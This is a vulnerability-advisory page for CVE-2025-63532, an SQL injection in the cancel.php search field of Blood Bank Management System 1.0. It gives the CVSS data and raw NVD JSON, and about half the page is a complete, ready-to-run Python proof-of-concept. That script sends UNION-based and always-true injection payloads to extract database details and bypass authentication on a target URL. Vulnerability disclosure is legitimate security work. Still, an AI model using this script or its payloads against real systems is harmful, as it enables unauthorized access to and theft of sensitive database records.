Security Vulnerability Report
中文
CVE-2025-63532 CVSS 9.6 CRITICAL

CVE-2025-63532

Published: 2025-12-01 16:15:56
Last Modified: 2025-12-04 18:08:17
Source: [email protected]

Description

A SQL injection vulnerability exists in the Blood Bank Management System 1.0 within the cancel.php component. The application fails to properly sanitize user-supplied input in SQL queries, allowing an attacker to inject arbitrary SQL code. By manipulating the search field, an attacker can bypass authentication and gain unauthorized access to the system.

CVSS Details

CVSS Score
9.6
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:shridharshukl:blood_bank_management_system:1.0:*:*:*:*:*:*:* - VULNERABLE
Blood Bank Management System 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # CVE-2025-63532 SQL Injection PoC # Target: Blood Bank Management System 1.0 - cancel.php # Author: Security Researcher # Note: For authorized testing only import requests import sys from urllib.parse import urlencode def exploit_sql_injection(target_url, payload): """ Execute SQL injection attack on cancel.php search parameter """ # Construct the malicious request params = { 'search': payload # Injected SQL payload } headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Content-Type': 'application/x-www-form-urlencoded' } try: # Send the malicious request response = requests.post( f"{target_url}/cancel.php", data=params, headers=headers, timeout=30 ) return response.text except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return None def extract_database_info(target_url): """ Extract database version and current user using UNION-based injection """ # Payload to extract database version version_payload = "' UNION SELECT NULL,version(),user(),database()-- -" print("[*] Extracting database information...") result = exploit_sql_injection(target_url, version_payload) return result def bypass_authentication(target_url): """ Bypass authentication by injecting SQL to return true condition """ # Authentication bypass payload auth_bypass = "' OR '1'='1" print("[*] Attempting authentication bypass...") result = exploit_sql_injection(target_url, auth_bypass) return result def main(): if len(sys.argv) < 2: print("Usage: python3 cve-2025-63532.py <target_url>") print("Example: python3 cve-2025-63532.py http://victim.com/blood-bank") sys.exit(1) target = sys.argv[1].rstrip('/') print("=" * 60) print("CVE-2025-63532 SQL Injection PoC") print("Target: Blood Bank Management System 1.0") print("Component: cancel.php") print("=" * 60) # Step 1: Extract database information print("\n[1] Extracting database information...") db_info = extract_database_info(target) if db_info: print("[+] Database info extracted successfully") # Step 2: Bypass authentication print("\n[2] Attempting authentication bypass...") auth_result = bypass_authentication(target) if auth_result: print("[+] Authentication bypass attempted") print("\n[*] PoC execution completed") print("[*] Further exploitation requires manual analysis of responses") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63532", "sourceIdentifier": "[email protected]", "published": "2025-12-01T16:15:55.800", "lastModified": "2025-12-04T18:08:16.560", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A SQL injection vulnerability exists in the Blood Bank Management System 1.0 within the cancel.php component. The application fails to properly sanitize user-supplied input in SQL queries, allowing an attacker to inject arbitrary SQL code. By manipulating the search field, an attacker can bypass authentication and gain unauthorized access to the system."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N", "baseScore": 9.6, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 5.8}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:shridharshukl:blood_bank_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "5B391DFD-8072-4642-9A31-9E4DE8648367"}]}]}], "references": [{"url": "https://drive.google.com/file/d/12yeOXW_sN69QjsQtW0_k9AGqozi1s0di/view?usp=sharing", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://github.com/Shridharshukl/Blood-Bank-Management-System", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/kiwi865/CVEs/blob/main/CVE-2025-63532.md", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.